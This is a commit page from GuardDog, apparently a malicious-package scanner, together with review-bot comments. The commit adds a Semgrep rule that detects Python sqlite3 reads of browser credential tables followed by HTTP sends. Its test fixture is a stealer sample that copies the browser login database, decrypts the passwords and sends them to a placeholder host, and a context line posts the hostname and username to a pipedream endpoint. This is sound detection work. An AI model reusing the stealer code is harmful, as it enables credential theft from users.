Add detection for Python sqlite3 data exfiltration (#420)
* Add Python sqlite3 data exfiltration rule coverage

* Incorporate change requests

* Match only on targeted table names
ikretz authored Jul 19, 2024
1 parent 104e883 commit 8545867
Showing 2 changed files with 35 additions and 0 deletions.
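--- a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
+++ b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
@@ -31,6 +31,18 @@ rules:
           - metavariable-regex:
               metavariable: $ENVVAR
               regex: ([\"\'](AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|AWS_SESSION_TOKEN)[\"\'])
+      - patterns:
+          - pattern-inside: |
+              $CONNECT = sqlite3.connect(...)
+              ...
+              $CURSOR = $CONNECT.cursor(...)
+              ...
+          - pattern: $CURSOR.execute($QUERY, ...)
+          - metavariable-pattern:
+              metavariable: $QUERY
+              patterns:
+                - pattern: "..."
+                - pattern-regex: (?i)(cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins)
     pattern-sinks:
       - pattern-either:
           - pattern-inside: requests.$METHOD(...)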
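Review bot: The pattern-regex on the last added line is unanchored and is tested against the whole query string, so any literal that merely contains one of the words matches — `SELECT value FROM settings WHERE name = 'cookies'` or a table named `user_logins_archive` would both be flagged — which is looser than the "match only on targeted table names" intent in the commit message. Tying the alternation to the table position, `pattern-regex: (?i)\bFROM\s+(cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins)\b`, keeps the six names but drops most incidental hits; quoted or backticked table names would need the optional quote handled too, so confirm against the fixtures before tightening. The `- pattern: "..."` line restricts $QUERY to a string literal, so queries built with f-strings or concatenation are not covered; a one-line comment above it stating that limitation would save the next maintainer from assuming broader coverage. The enclosing pattern-sources list starts above the hunk.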
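--- a/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py
+++ b/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py
@@ -226,3 +226,26 @@ def run(self):
         ploads = {'hostname':hostname,'cwd':cwd,'username':username}
         # ruleid: exfiltrate-sensitive-data
         requests.get("https://eo6ksiuyau5e5x2.m.pipedream.net",params = ploads)
+
+
+""" RULEID: sqlite3 data exfiltration
+"""
+
+def steal_passwords2(self, name: str, path: str, profile: str):
+    path = "path"
+    if not os.path.isfile(path):
+        return
+    loginvault = self.random_dir_create()
+    copy2(path, loginvault)
+    conn = sqlite3.connect(loginvault)
+    cursor = conn.cursor()
+    with open(os.path.join(self.dir, "Browsers", "All Passwords.txt"), 'a', encoding="utf-8") as f:
+        for res in cursor.execute("SELECT origin_url, username, password_value FROM logins").fetchall():
+            url, username, password = res
+            password = self.dcrpt_val(password, self.masterkey)
+            if url != "":
+                params = {'url': url, 'username': username, 'password': password}
+                # ruleid: exfiltrate-sensitive-data
+                requests.get("https://example.com", params=params)
+    cursor.close()
+    conn.close()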
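Review bot: The new fixture only asserts the positive case; since the rule is now keyed on the table name in the query, a negative counterpart would pin that behaviour and catch an over-broad regex. A second function with the same `sqlite3.connect` / `.cursor()` / `.execute(...)` shape but an unrelated query such as `cursor.execute("SELECT key, value FROM settings")`, followed by the same `requests.get(...)` line annotated `# ok: exfiltrate-sensitive-data`, is enough. Within the added function, `path = "path"` overwrites the parameter on the first line and `f` is opened but never written to; both are harmless for a Semgrep fixture, but a short comment such as `# fixture only: values are placeholders, the shape is what the rule matches` would make that deliberate rather than look like leftover code.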
